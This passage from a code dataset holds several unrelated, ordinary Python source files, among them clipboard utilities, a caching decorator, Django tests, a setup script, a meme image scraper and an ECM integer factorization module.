ArenaExcelUtils import logger, ClipboardSettings\n\n\ndef Copy(data, clipFormat=FClipboard.CF_TEXT):\n source = FClipboard.ToClipboardData(data)\n FClipboard.SetClipboardData(clipFormat, source)\n \ndef CopyCells(cells, htmlCells):\n with FClipboard.ClipboardHandler():\n Copy(Html(htmlCells), clipFormat=FClipboard.CF_HTML)\n Copy(Text(cells))\n \ndef Html(htmlCellMatrix):\n htmlTable = ArenaExcelHtmlSheet.HtmlTablePrinter(htmlCellMatrix).Print()\n return FHtmlClipboard.HtmlClipboard().GetSource(htmlTable)\n \ndef Text(cellMatrix):\n return ArenaExcelSheet.TextPrinter(cellMatrix).Print()\n\ndef CopyAllCells(eii):\n try:\n sheet = eii.ExtensionObject().ActiveSheet()\n sheetMatrix = list(ArenaExcelSheet.SheetMatrix(sheet))\n sheetCells = ArenaExcelSheet.CellsFromSheet(sheetMatrix, sheet, ClipboardSettings())\n sheetHtmlCells = ArenaExcelHtmlSheet.HtmlCellsFromArenaExcelSheet(sheetCells)\n CopyCells(sheetCells, sheetHtmlCells)\n except Exception as err:\n logger.error(err, exc_info=True)\n\ndef CopySelectedCells(eii):\n try:\n sheet = eii.ExtensionObject().ActiveSheet()\n selectionMatrix = list(ArenaExcelSheet.SelectionMatrix(sheet))\n selectedCells = ArenaExcelSheet.CellsFromSelection(selectionMatrix, sheet, ClipboardSettings())\n selectedHtmlCells = ArenaExcelHtmlSheet.HtmlCellsFromArenaExcelSelection(selectedCells)\n CopyCells(selectedCells, selectedHtmlCells)\n except Exception as err:\n logger.error(err, exc_info=True)\n \ndef CopyVisibleCells(eii):\n try:\n sheet = eii.ExtensionObject().ActiveSheet()\n sheetMatrix = list(ArenaExcelSheet.SheetMatrix(sheet, visibleCellsOnly=True))\n sheetCells = ArenaExcelSheet.CellsFromSheet(sheetMatrix, sheet, ClipboardSettings())\n sheetHtmlCells = ArenaExcelHtmlSheet.HtmlCellsFromArenaExcelSheet(sheetCells)\n CopyCells(sheetCells, sheetHtmlCells)\n except Exception as err:\n logger.error(err, exc_info=True)\n","sub_path":"Extensions/Arena Excel/FPythonCode/ArenaExcelActions.py","file_name":"ArenaExcelActions.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"370374075","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Daniel Greenfeld'\n__email__ = 'pydanny@gmail.com'\n__version__ = '1.0.0'\n__license__ = 'BSD'\n\nfrom time import time\nimport threading\n\n\nclass cached_property(object):\n \"\"\" A property that is only computed once per instance and then replaces\n itself with an ordinary attribute. Deleting the attribute resets the\n property.\n\n Source: https://github.com/bottlepy/bottle/commit/fa7733e075da0d790d809aa3d2f53071897e6f76\n \"\"\" # noqa\n\n def __init__(self, ttl=None):\n ttl_or_func = ttl\n self.ttl = None\n if callable(ttl_or_func):\n self.prepare_func(ttl_or_func)\n else:\n self.ttl = ttl_or_func\n\n def prepare_func(self, func, doc=None):\n '''Prepare to cache object method.'''\n self.func = func\n self.__doc__ = doc or func.__doc__\n self.__name__ = func.__name__\n self.__module__ = func.__module__\n\n def __call__(self, func, doc=None):\n self.prepare_func(func, doc)\n return self\n\n def __get__(self, obj, cls):\n if obj is None:\n return self\n\n now = time()\n try:\n value, last_update = obj._cache[self.__name__]\n if self.ttl and self.ttl > 0 and now - last_update > self.ttl:\n raise AttributeError\n except (KeyError, AttributeError):\n value = self.func(obj)\n try:\n cache = obj._cache\n except AttributeError:\n cache = obj._cache = {}\n cache[self.__name__] = (value, now)\n\n return value\n\n def __delattr__(self, name):\n print(name)\n\n\nclass threaded_cached_property(cached_property):\n \"\"\" A cached_property version for use in environments where multiple\n threads might concurrently try to access the property.\n \"\"\"\n def __init__(self, ttl=None):\n super(threaded_cached_property, self).__init__(ttl)\n self.lock = threading.RLock()\n\n def __get__(self, obj, cls):\n with self.lock:\n # Double check if the value was computed before the lock was\n # acquired.\n prop_name = self.__name__\n if hasattr(obj, '_cache') and prop_name in obj._cache:\n return obj._cache[prop_name][0]\n\n # If not, do the calculation and release the lock.\n return super(threaded_cached_property, self).__get__(obj, cls)\n","sub_path":"cached_property.py","file_name":"cached_property.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"638071362","text":"import os\r\nimport numpy as np\r\nimport utils\r\nimport pandas as pd\r\nfrom models import AttnClassifier\r\nimport torch\r\nimport shutil\r\n\r\n\r\ndef project_attn(dataset, data_type, gene_or_pathway, img_data_dir=None, save_top_weighted_patches=False):\r\n data_dir = './experiments/{:s}/{:s}/{:s}/test_best'.format(dataset, data_type, gene_or_pathway)\r\n save_dir = '{:s}/attn_maps'.format(data_dir)\r\n os.makedirs(save_dir, exist_ok=True)\r\n\r\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n\r\n model_path = './experiments/{:s}/{:s}/{:s}/checkpoint_30.pth.tar'.format(dataset, data_type, gene_or_pathway)\r\n model = AttnClassifier(2048, 2)\r\n model = model.cuda()\r\n best_checkpoint = torch.load(model_path)\r\n model.load_state_dict(best_checkpoint['state_dict'])\r\n gamma = model.attn.gamma.item()\r\n\r\n data_split = np.load('../data/{:s}/data_split.npy'.format(dataset), allow_pickle=True).item()\r\n\r\n test_attns = np.load('{:s}/test_attn_maps.npy'.format(data_dir), allow_pickle=True).item()\r\n test_probs = np.load('{:s}/test_prob_results.npy'.format(data_dir), allow_pickle=True).item()\r\n indices = {}\r\n attn_weights_all = {}\r\n labels = {}\r\n for slide_name in data_split['test']:\r\n if slide_name not in test_attns.keys():\r\n continue\r\n attn = np.array(test_attns[slide_name]['attn'])\r\n indices[slide_name] = np.array(test_attns[slide_name]['true_indices'])\r\n\r\n attn_weights = np.sum(attn, axis=0) * gamma + 1\r\n attn_weights_normalized = np.log(attn_weights) / np.max(np.log(attn_weights))\r\n\r\n # save top 20 patches\r\n if save_top_weighted_patches:\r\n label = test_probs[slide_name]['label']\r\n os.makedirs('{:s}/top_weighted_patches/{:d}_{:s}'.format(data_dir, label, slide_name), exist_ok=True)\r\n sorted_attn_weights = sorted(attn_weights)[::-1]\r\n index_sorted = np.argsort(attn_weights)[::-1]\r\n for i in range(20):\r\n index = indices[slide_name][index_sorted[i]]\r\n img_path = '{:s}/{:s}/{:d}.png'.format(img_data_dir, slide_name, index)\r\n shutil.copy2(img_path, '{:s}/top_weighted_patches/{:d}_{:s}/{:d}-{:d}-{:.4f}.png'\r\n .format(data_dir, label, slide_name, i+1, index, sorted_attn_weights[i]))\r\n\r\n attn_weights_all[slide_name] = attn_weights_normalized\r\n labels[slide_name] = test_probs[slide_name]['label']\r\n\r\n utils.project_results(dataset, data_split['test'], indices, save_dir, color=(0, 255, 0), on_thumbnail=False,\r\n slides_probs=attn_weights_all, slides_labels=labels)\r\n\r\n\r\nif __name__ == '__main__':\r\n dataset = 'TCGA-LUAD'\r\n gene_or_pathway = 'TP53'\r\n data_type = 'mutation'\r\n img_data_dir = '../data/{:s}/20x_512x512'.format(dataset)\r\n project_attn(dataset, data_type, gene_or_pathway, img_data_dir, save_top_weighted_patches=False)","sub_path":"code_validation_on_lung_and_liver/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"265391359","text":"from django.test import TestCase\nfrom django.db.utils import IntegrityError\n\nfrom core.models import User\n\n\nclass TestUserModel(TestCase):\n def test_cannot_create_users_with_duplicate_emails(self):\n try:\n user1 = User.objects.create(email=\"admin@admin.com\")\n user2 = User.objects.create(email=\"admin@admin.com\")\n except IntegrityError as e:\n self.assertEquals(str(e), \"UNIQUE constraint failed: core_user.email\")\n self.assertRaises(IntegrityError)\n\n def test_creating_users_with_duplicate_username_raises_integrity_error(self):\n try:\n user1 = User.objects.create(\n username=\"ea6c5a25-41c1-4aeb-8d2d-8a64f86555ff\", email=\"foo@admin.com\"\n )\n user2 = User.objects.create(\n username=\"ea6c5a25-41c1-4aeb-8d2d-8a64f86555ff\", email=\"bar@admin.com\"\n )\n except IntegrityError as e:\n self.assertEquals(str(e), \"UNIQUE constraint failed: core_user.username\")\n self.assertRaises(IntegrityError)\n\n def test_user_object_is_identified_using_email(self):\n user1 = User.objects.create(email=\"foo@admin.com\")\n user2 = User.objects.create(email=\"bar@admin.com\")\n user3 = User.objects.create(email=\"baz@admin.com\")\n\n self.assertEquals(user1.__str__(), \"foo@admin.com\")\n self.assertEquals(user2.__str__(), \"bar@admin.com\")\n self.assertEquals(user3.__str__(), \"baz@admin.com\")\n","sub_path":"shynet/core/tests/models/test_user_model.py","file_name":"test_user_model.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"69717753","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport io\nimport json\nfrom setuptools import setup, find_packages\n\n\n_ver = sys.version_info\nis_py2 = (_ver[0] == 2)\nis_py3 = (_ver[0] == 3)\n\n\nDIR = os.path.abspath(os.path.dirname(__file__))\nPKG = os.path.join(DIR, 'jsontableschema')\nREADME = 'README.md'\nLICENSE = 'LICENSE'\nINFO = 'info.json'\nREADME_PATH = os.path.join(DIR, README)\nLICENSE_PATH = os.path.join(DIR, LICENSE)\nINFO_PATH = os.path.join(PKG, INFO)\n\nwith io.open(README_PATH, mode='r+t', encoding='utf-8') as stream:\n description_text = stream.read()\n\nwith io.open(LICENSE_PATH, mode='r+t', encoding='utf-8') as stream:\n license_text = stream.read()\n\nwith io.open(INFO_PATH, mode='r+t', encoding='utf-8') as stream:\n info = json.loads(stream.read())\n\nlong_description = '{0}\\n\\n{1}'.format(description_text, license_text)\n\ndependencies = [\n 'click>=3.3',\n 'requests>=2.5.1',\n 'python-dateutil>=2.4.0',\n 'rfc3986>=0.3.0',\n 'jsonschema>=2.5.1',\n 'future>=0.15.2'\n]\n\nclassifiers = [\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n]\n\nsetup(\n name=info['slug'],\n version=info['version'],\n description=info['description'],\n long_description=long_description,\n author=info['author'],\n author_email=info['author_email'],\n url=info['url'],\n license=info['license'],\n packages=find_packages(exclude=['docs', 'tests']),\n package_data={'jsontableschema': ['*.json', 'geojson/*json']},\n package_dir={info['slug']: info['slug']},\n install_requires=dependencies,\n zip_safe=False,\n keywords=\"open data frictionless data json schema json table schema data package tabular data package\",\n classifiers=classifiers,\n entry_points={\n 'console_scripts': [\n 'jsontableschema = jsontableschema.cli:main',\n ]\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"95915755","text":"from direct.distributed.DistributedObjectGlobalUD import DistributedObjectGlobalUD\r\nfrom toontown.suit.MegaInvasionGlobals import *\r\nfrom datetime import datetime\r\nfrom toontown.parties.ToontownTimeZone import ToontownTimeZone\r\n\r\nPARSE_INTERVAL = 60\r\n\r\n\r\nclass MegaInvasionManagerUD(DistributedObjectGlobalUD):\r\n notify = directNotify.newCategory('MegaInvasionManagerUD')\r\n\r\n def announceGenerate(self):\r\n DistributedObjectGlobalUD.announceGenerate(self)\r\n taskMgr.doMethodLater(10, self.parseInvasions, self.uniqueName('parseInvasions'))\r\n self.calledInvasion = None\r\n\r\n def parseInvasions(self, task):\r\n for invasion in invasions:\r\n if self.calledInvasion is not None:\r\n continue\r\n\r\n index = invasions.index(invasion)\r\n if index == self.calledInvasion:\r\n continue\r\n\r\n start = parseInvasionTime(invasion[START_TIME])\r\n end = parseInvasionTime(invasion[END_TIME])\r\n now = datetime.now(tz=ToontownTimeZone())\r\n if start < now < end:\r\n taskMgr.remove(self.uniqueName('endInvasion'))\r\n self.calledInvasion = index\r\n self.callInvasion(index)\r\n timeLeft = end - now\r\n taskMgr.doMethodLater(timeLeft.total_seconds(), self.endInvasion, self.uniqueName('endInvasion'),\r\n extraArgs=[index], appendTask=False)\r\n\r\n taskMgr.doMethodLater(PARSE_INTERVAL, self.parseInvasions, self.uniqueName('parseInvasions'))\r\n\r\n def callInvasion(self, index):\r\n self.sendUpdate('callInvasion', [index])\r\n\r\n def endInvasion(self, index):\r\n self.calledInvasion = None\r\n self.sendUpdate('endInvasion', [index])\r\n\r\n def hello(self):\r\n if self.calledInvasion is not None:\r\n self.sendUpdateToChannel(self.air.getAvatarIdFromSender(), 'callInvasion', [self.calledInvasion])","sub_path":"uberdog/MegaInvasionManagerUD.py","file_name":"MegaInvasionManagerUD.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"476967127","text":"#!/usr/bin/env python3\nimport sys\n\n\nclass Node_Tree_Element(object):\n \"\"\"individual element of the node tree\n These objects contain node information such as left child, right child,\n level on the tree and node integer value\n \"\"\"\n def __init__(self, node_value):\n assert isinstance(node_value, int)\n self.__node_level = None\n self.__node_value = node_value\n self.__best_path_down = None\n self.__left_child = None\n self.__right_child = None\n\n def get_nl(self):\n return self.__node_level\n\n def set_nl(self, node_level):\n assert isinstance(node_level, int)\n assert node_level > -1\n self.__node_level = node_level\n\n def del_nl(self):\n pass\n\n node_level = property(get_nl, set_nl, del_nl)\n\n def get_nv(self):\n return self.__node_value\n\n def set_nv(self, node_value):\n assert isinstance(node_value, int)\n assert node_value > -1\n self.__node_value = node_value\n\n def del_nv(self):\n pass\n\n node_value = property(get_nv, set_nv, del_nv)\n\n def get_bpd(self):\n return self.__best_path_down\n\n def set_bpd(self, best_path_down):\n assert isinstance(best_path_down, str)\n self.__best_path_down = best_path_down\n\n def del_bpd(self):\n pass\n\n best_path_down = property(get_bpd, set_bpd, del_bpd)\n\n def get_lc(self):\n return self.__left_child\n\n def set_lc(self, left_child):\n assert isinstance(left_child, int)\n assert left_child > 0\n self.__left_child = left_child\n\n def del_lc(self):\n pass\n\n left_child = property(get_lc, set_lc, del_lc)\n\n def get_rc(self):\n return self.__right_child\n\n def set_rc(self, right_child):\n assert isinstance(right_child, int)\n assert right_child > 0\n self.__right_child = right_child\n\n def del_rc(self):\n pass\n\n right_child = property(get_rc, set_rc, del_rc)\n\n\nclass Node_Tree(list):\n \"\"\"this class is an extension of the list class\n set to only allow Node_Tree_Elements in it\n \"\"\"\n\n def append(self, *args, **kwargs):\n assert isinstance(args[0], Node_Tree_Element)\n return list.append(self, *args, **kwargs)\n\n def insert(self, *args, **kwargs):\n assert isinstance(args[0], Node_Tree_Element)\n return list.insert(self, *args, **kwargs)\n\n\ndef main(argv=None):\n\n file_name = argv\n number_of_levels = 0\n number_of_elements = 0\n nt = Node_Tree()\n\n # load text files into the tree by creating elements based on input\n # file contains lines with numbers, each line new level\n # file must contain only valid integers with separating space\n with open(file_name, encoding='utf-8') as file_in:\n for line_in in file_in:\n # remove trailing newline, etc.\n line_in = line_in.rstrip()\n split_line = line_in.split(\" \")\n for value_in in split_line:\n nte = Node_Tree_Element(int(value_in))\n nte.node_level = number_of_levels\n number_of_elements += 1\n nt.append(nte)\n number_of_levels += 1\n\n # now that all of the values are in the tree the left and right children\n # locations need to be set so the tree can be traversed\n # the last level - leaf nodes will be left null\n this_element = 0\n this_level = 0\n add_child_pointers_below_these_levels = number_of_levels - 1\n\n # only up to last level\n while this_level < add_child_pointers_below_these_levels:\n # left and right children are determined by a calculation to determine\n # position in the tree based on input file\n lc_position = this_element + this_level + 1\n rc_position = lc_position + 1\n nt[this_element].left_child = lc_position\n nt[this_element].right_child = rc_position\n this_element += 1\n this_level = nt[this_element].node_level\n\n # start at last node and roll up the best path for each node based on\n # the either the left or right child\n # use number of elements for relative subscript so decrease by 1\n max_nodes = number_of_elements - 1\n for i in range(max_nodes, -1, -1):\n lc = nt[i].left_child\n rc = nt[i].right_child\n new_node_value = 0\n if ((lc == None) or (rc == None)):\n # the bottom nodes have no children\n new_node_value = nt[i].node_value\n new_best_path_down = \"\\n\" \\\n + str(nt[i].node_value) \\\n + \" at node \" \\\n + str(i) \\\n + \" on level \" \\\n + str(nt[i].node_level)\n else:\n if (nt[lc].node_value > nt[rc].node_value):\n new_node_value = nt[i].node_value + nt[lc].node_value\n new_best_path_down = \"\\n\" \\\n + str(nt[i].node_value) \\\n + \" at node \" \\\n + str(i) \\\n + \" on level \" \\\n + str(nt[lc].node_level) \\\n + str(nt[lc].best_path_down)\n else:\n new_node_value = nt[i].node_value + nt[rc].node_value\n new_best_path_down = \"\\n\" \\\n + str(nt[i].node_value) \\\n + \" at node \" \\\n + str(i) \\\n + \" on level \" \\\n + str(nt[rc].node_level) \\\n + str(nt[rc].best_path_down)\n nt[i].node_value = new_node_value\n nt[i].best_path_down = new_best_path_down\n\n with open(\"solution.txt\", \"w\") as solution_file:\n solution_file.write(\"Max Value is \" + str(nt[0].node_value) + \"\\n\")\n solution_file.write(\"The Best Path chosen was: \" \\\n + str(nt[0].best_path_down))\n\n return 0\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n sys.stderr.write(\"no file name provided\")\n else:\n main(sys.argv[1])\n sys.exit()\n","sub_path":"TrianglePuzzlePython3/src/Triangle.py","file_name":"Triangle.py","file_ext":"py","file_size_in_byte":5956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"365588755","text":"import requests\r\nfrom bs4 import BeautifulSoup as bs\r\nimport os\r\nimport pandas as pd\r\nimport ssl\r\n\r\ndef is_meta_description(tag):\r\n return tag.name == 'meta' and tag['name'] == 'thumbnail'\r\ndf = pd.read_csv(\"data.csv\")\r\nsave_path='./memes/'\r\nfor i in range(1000):\r\n print(i)\r\n img_uid = df['img_id'][i]\r\n url = 'https://memegenerator.net/instance/'+str(img_uid)\r\n r = requests.get(url)\r\n soup = bs(r.text,'html.parser')\r\n image_url = soup.select_one('[rel=\"image_src\"]')['href']\r\n \r\n complete_name = os.path.join(save_path, f\"{img_uid}.jpg\")\r\n response = requests.get(image_url, stream=True)\r\n \r\n with open(complete_name, 'wb') as im_file:\r\n im_file.write(response.content)\r\n del response\r\n \r\n \r\n\r\n\r\nmeta_tag = soup.find(is_meta_description)","sub_path":"meme2caption/Imgid2meme.py","file_name":"Imgid2meme.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"478276182","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#-------------------------------------------------------------------------\n#\n# 日志处理模块\n#\n#-------------------------------------------------------------------------\n\nimport os\nimport sys\nimport time\n\n__all__ = ['Log']\n\nclass Log:\n\n def __init__(self, config):\n self.config = config\n self.path = self._get_file_path()\n \n def write(self, message):\n if not message:\n return\n if isinstance(message, list):\n lines = message\n else:\n lines = [message]\n prefix = self._format_message_prefix()\n chunks = [ ]\n chunks.append(prefix + lines[0] + '\\n')\n for line in lines[1:]:\n chunks.append(line + '\\n')\n text = ''.join(chunks)\n data = text.encode('utf_8', errors='ignore')\n self._append(data) \n\n def _append(self, data):\n if not data:\n return\n path = self._get_resolved_file_path()\n try:\n open(path, 'a+b').write(data)\n except (OSError, IOError):\n # file IO error ignored\n pass\n\n def _format_message_prefix(self):\n return time.strftime('[%Y-%m-%d %H:%M:%S] ')\n \n def _get_resolved_file_path(self):\n name = time.strftime('%Y_%m_%d.txt')\n return os.path.join(self.path, name)\n\n def _get_file_path(self):\n key = 'log_file_path'\n path = self.config.get(key)\n if not path:\n print('Error: missing config option \"%s\"' % key)\n sys.exit(1)\n if not os.path.isdir(path):\n print('Error: path not found %s' % path)\n sys.exit(1)\n return path\n","sub_path":"weibo_comment/ghost_log.py","file_name":"ghost_log.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"522447536","text":"\"\"\"Integer factorization using ECM.\n\"\"\"\nfrom collections import defaultdict\nimport random\nfrom wheel_sieve.miller_rabin import miller_rabin, witness_prime\nfrom wheel_sieve.common import PRIME_GEN, inv_power\nfrom wheel_sieve.ecm.ecm_polyeval import ecm\n\n\ndef factor_small_primes(n, ubound):\n \"\"\"Factor n with small primes into :math:`n = \\\\prod_{i} {p_i}^{d_{p_i}} * x`.\n\n Args:\n n (int): Number to be factored.\n ubound (int): Upper bound for small primes, not inclusive.\n\n Returns:\n tuple(dict, int): (prime_factors, x), where\n\n - **prime_factors** (dict(int, int)): mapping :math:`p_i` to :math:`d_{p_i}`.\n - **x** (int): Integer x.\n\n \"\"\"\n prime_factors = dict()\n x = n\n for prime in PRIME_GEN(ubound):\n power = 0\n while x % prime == 0:\n power += 1\n x //= prime\n if power > 0:\n prime_factors[prime] = power\n return prime_factors, x\n\n\ndef factor_power(n, ubound):\n \"\"\"Find a factor of n if n is a perfect k-th power for some k < ubound.\n i.e. :math:`n = d^k` for some integers d, k, where k >= 2.\n\n Args:\n n (int): Number to be factored.\n ubound (int): Upper bound for k, not inclusive.\n\n Returns:\n tuple(int, int): (d, k), or (None, None) if n is not a perfect power.\n \"\"\"\n for power in PRIME_GEN(ubound):\n factor = inv_power(n, power)\n if factor is not None:\n return factor, power\n return None, None\n\n\ndef factor_ecm(n, ecm_kwargs_list, seed=None):\n \"\"\"Find a factor of a number n using ECM.\n\n Args:\n n (int): Number to be factored.\n ecm_kwargs_list (list(dict)): List of dicts containing keyword arguments to be passed to ecm\n call.\n seed (int, optional): Random seed to be set every ecm call. Defaults to None.\n\n Returns:\n int: Factor, or None if not found.\n \"\"\"\n for ecm_kwargs in ecm_kwargs_list:\n if seed is not None:\n random.seed(seed)\n factor = ecm(n, **ecm_kwargs)\n if factor is not None:\n return factor\n return None\n\n\ndef factorize(n, witness=None):\n \"\"\"Factorize a number n, where n >= 2, with ECM into\n :math:`n = \\\\prod_{i} {p_i}^{d_{p_i}} * \\\\prod_{j} {f_j}^{d_{f_j}}`.\n Each :math:`p_i` passes the Miller Rabin Primality Test and is (probably) prime.\n Each :math:`f_j` are known composite that cannot be factored because we try a fixed number\n of curves.\n\n Args:\n n (int): Integer to factorize.\n witness (list(int), optional): Witness to be used in Miller Rabin Primality Test.\n Defaults to witness_prime(100).\n\n Raises:\n ValueError: Thrown when n < 2\n\n Returns:\n tuple(dict, dict): (prime_factors, remaining_factors), where\n\n - **prime_factors** (dict(int, int)): mapping :math:`p_i` to :math:`d_{p_i}`.\n - **remaining_factors** (dict(int, int)): mapping :math:`f_j` to :math:`d_{f_j}`.\n\n \"\"\"\n if n < 2:\n raise ValueError\n if witness is None:\n witness = witness_prime(100)\n prime_factors, factor = factor_small_primes(n, 1033)\n if factor == 1:\n return prime_factors, dict()\n remaining_factors = defaultdict(int)\n working_dict = defaultdict(int)\n working_dict[factor] = 1\n while working_dict:\n factor_i, power_i = working_dict.popitem()\n if miller_rabin(factor_i, witness):\n for dt in [working_dict, remaining_factors]:\n for factor_j in list(dt.keys()):\n if factor_j % factor_i == 0:\n power_j = dt.pop(factor_j)\n while factor_j % factor_i == 0:\n factor_j //= factor_i\n power_i += power_j\n if factor_j > 1:\n working_dict[factor_j] += power_j\n prime_factors[factor_i] = power_i\n else:\n factor, power = factor_power(factor_i, factor_i.bit_length() // 10 + 1)\n if factor is not None:\n working_dict[factor] += power_i * power\n continue\n ecm_kwargs_list = [\n {\n \"rounds\": 10,\n \"b1\": 2_000,\n \"b2\": 50_000,\n \"wheel\": 210,\n \"output\": False,\n },\n {\n \"rounds\": 40,\n \"b1\": 11_000,\n \"b2\": 600_000,\n \"wheel\": 2310,\n \"output\": False,\n },\n {\n \"rounds\": 100,\n \"b1\": 50_000,\n \"b2\": 4_000_000,\n \"wheel\": 2310,\n \"output\": False,\n },\n {\n \"rounds\": 200,\n \"b1\": 250_000,\n \"b2\": 40_000_000,\n \"wheel\": 2310,\n \"output\": False,\n },\n ]\n factor = factor_ecm(factor_i, ecm_kwargs_list, seed=2)\n if factor is not None:\n working_dict[factor_i // factor] += power_i\n working_dict[factor] += power_i\n continue\n remaining_factors[factor_i] += power_i\n return prime_factors, dict(remaining_factors)\n\n\nif __name__ == \"__main__\":\n print(factorize((2 ** 256 - 1) * (2 ** 64 - 1) ** 3))\n","sub_path":"wheel_sieve/factorize.py","file_name":"factorize.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"254179216","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n===============================================================================\r\nmodule __OrdinaryPercolation__: Ordinary Percolation Algorithm\r\n===============================================================================\r\n\r\n\"\"\"\r\n\r\nimport scipy as sp\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom OpenPNM.Algorithms import GenericAlgorithm\r\nfrom OpenPNM.Base import logging\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\nclass OrdinaryPercolation(GenericAlgorithm):\r\n r\"\"\"\r\n Simulates a capillary drainage experiment by applying a list of increasing\r\n capillary pressures.\r\n\r\n Parameters\r\n ----------\r\n network : OpenPNM Network Object\r\n The network upon which the simulation will be run\r\n\r\n name : string, optional\r\n The name to assign to the Algorithm Object\r\n\r\n \"\"\"\r\n\r\n def __init__(self, network, name=None, **kwargs):\r\n super().__init__(network=network, name=name)\r\n if len(kwargs.keys()) > 0:\r\n self.setup(**kwargs)\r\n\r\n def setup(self,\r\n invading_phase,\r\n defending_phase=None,\r\n t_entry='throat.capillary_pressure',\r\n **kwargs):\r\n r\"\"\"\r\n invading_phase : OpenPNM Phase Object\r\n The invading phase to be injected into the Network\r\n\r\n p_inlets : array_like\r\n The injection points from which the invading phase accesses the\r\n Network. If no inlets are specified then the algorithm assumes\r\n no access limitations apply to the invading phase, which is\r\n equivalent to performaing a standard bond ordinary percolation.\r\n\r\n\r\n Notes\r\n -----\r\n The 'inlet' pores are initially filled with invading fluid to start the\r\n simulation. To avoid the capillary pressure curve showing a non-zero\r\n starting saturation at low pressures, it is necessary to apply boundary\r\n pores that have zero-volume, and set these as the inlets.\r\n \"\"\"\r\n self['throat.entry_pressure'] = invading_phase[t_entry]\r\n self['pore.inv_Pc'] = sp.inf\r\n self['throat.inv_Pc'] = sp.inf\r\n self['pore.inv_sat'] = sp.inf\r\n self['throat.inv_sat'] = sp.inf\r\n self._inv_phase = invading_phase\r\n self._def_phase = defending_phase\r\n self._trapping = False\r\n\r\n def set_inlets(self, pores):\r\n r\"\"\"\r\n Specify inlet locations\r\n\r\n Parameters\r\n ----------\r\n pores : array_like\r\n The injection points from which the invading phase accesses the\r\n Network. If no inlets are specified then the algorithm assumes\r\n no access limitations apply to the invading phase, which is\r\n equivalent to performaing a standard bond ordinary percolation.\r\n\r\n\r\n Notes\r\n -----\r\n The 'inlet' pores are initially filled with invading fluid to start the\r\n simulation. To avoid the capillary pressure curve showing a non-zero\r\n starting saturation at low pressures, it is necessary to apply boundary\r\n pores that have zero-volume, and set these as the inlets.\r\n \"\"\"\r\n Ps = sp.array(pores)\r\n if sp.size(Ps) > 0:\r\n if Ps.dtype == bool:\r\n Ps = self._net.Ps[Ps]\r\n self['pore.inlets'] = False\r\n self['pore.inlets'][Ps] = True\r\n\r\n def set_outlets(self, pores, defending_phase=None):\r\n r\"\"\"\r\n Specify outlet locations\r\n\r\n Parameters\r\n ----------\r\n pores : array_like\r\n The pores through which the defending phase exits the Network.\r\n\r\n defending_phase : OpenPNM Phase Object\r\n The Phase object defining the defending phase. The defending Phase\r\n may be specified during the ``setup`` step, or through this method.\r\n \"\"\"\r\n if defending_phase is not None:\r\n self._def_phase = defending_phase\r\n\r\n self._trapping = True\r\n\r\n Ps = sp.array(pores)\r\n if sp.size(Ps) > 0:\r\n if Ps.dtype == bool:\r\n Ps = self._net.Ps[Ps]\r\n self['pore.outlets'] = False\r\n self['pore.outlets'][Ps] = True\r\n\r\n def run(self, npts=25, inv_points=None, access_limited=True, **kwargs):\r\n r\"\"\"\r\n Parameters\r\n ----------\r\n npts : int (default = 25)\r\n The number of pressure points to apply. The list of pressures\r\n is logarithmically spaced between the lowest and highest throat\r\n entry pressures in the network.\r\n\r\n inv_points : array_like, optional\r\n A list of specific pressure point(s) to apply.\r\n\r\n \"\"\"\r\n if 'inlets' in kwargs.keys():\r\n logger.info('Inlets recieved, passing to set_inlets')\r\n self.set_inlets(pores=kwargs['inlets'])\r\n if 'outlets' in kwargs.keys():\r\n logger.info('Outlets recieved, passing to set_outlets')\r\n self.set_outlets(pores=kwargs['outlets'])\r\n self._AL = access_limited\r\n if inv_points is None:\r\n logger.info('Generating list of invasion pressures')\r\n min_p = sp.amin(self['throat.entry_pressure']) * 0.98 # nudge down\r\n max_p = sp.amax(self['throat.entry_pressure']) * 1.02 # bump up\r\n inv_points = sp.logspace(sp.log10(min_p),\r\n sp.log10(max_p),\r\n npts)\r\n\r\n self._npts = sp.size(inv_points)\r\n # Execute calculation\r\n self._do_outer_iteration_stage(inv_points)\r\n\r\n def _do_outer_iteration_stage(self, inv_points):\r\n # Generate curve from points\r\n for inv_val in inv_points:\r\n # Apply one applied pressure and determine 